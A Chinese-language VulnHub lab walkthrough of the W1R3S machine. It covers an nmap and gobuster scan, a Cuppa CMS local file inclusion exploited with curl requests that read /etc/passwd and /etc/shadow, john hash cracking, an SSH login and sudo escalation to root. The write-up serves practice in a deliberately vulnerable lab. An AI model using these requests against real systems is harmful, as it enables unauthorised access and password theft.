vulnhub靶机实战——W1R3S

环境

 

靶机ip:192.168.163.132

攻击机ip:192.168.163.129

目的:拿下靶机并获得root权限

 

渗透

首先nmap扫描端口

nmap -sC -sV 192.168.163.132

vulnhub靶机实战——W1R3S_第1张图片

可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。

首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有没有可利用的文件。

各种文件夹翻了一遍并没有什么东西,找的时候发现两串hash,解密hash内容一个是这不是密码,另一个是告诉我们没有这么简单(心疼解密时花的一块钱),放弃ftp

访问80,是apache的默认页面,没什么发现。

使用gobuster扫目录

这个时候我们发现了两个有趣的目录

/wordpress和/administrator

访问了wordpress,也是没什么东西。

于是访问/administrator,发现cms是cuppa

vulnhub靶机实战——W1R3S_第2张图片

 果断找这个cms的漏洞,只有一个先下载下来看看

vulnhub靶机实战——W1R3S_第3张图片

看到这个cms存在lfi漏洞,根据txt中的内容进行构造url

http://192.168.163.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在浏览器中输入上面的URL,页面没有任何返回。
尝试使用curl命令,对参数urlconfig的参数进行urlencode
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.163.132/administrator/alerts/alertConfigField.php 
成功显示,修改命令为
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow  http://192.168.163.132/administrator/alerts/alertConfigField.php
vulnhub靶机实战——W1R3S_第4张图片

把有密码的几个用户信息全部复制下来,放入pass.txt中

john pass.txt解出一个w1r3s的密码,ssh登陆

vulnhub靶机实战——W1R3S_第5张图片

尝试root

命令行输入sudo -l(此处因为比较简单所以懒得截图了,凑活看吧)

w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL

 

这时我们看到,w1r3s用户可运行任何命令

sudo su即可切换到root

 ps:靶机比较简单,写这个文章只是为了记录一下,仅此而已。

转载于:https://www.cnblogs.com/Aasion/p/10859018.html

你可能感兴趣的:(vulnhub靶机实战——W1R3S)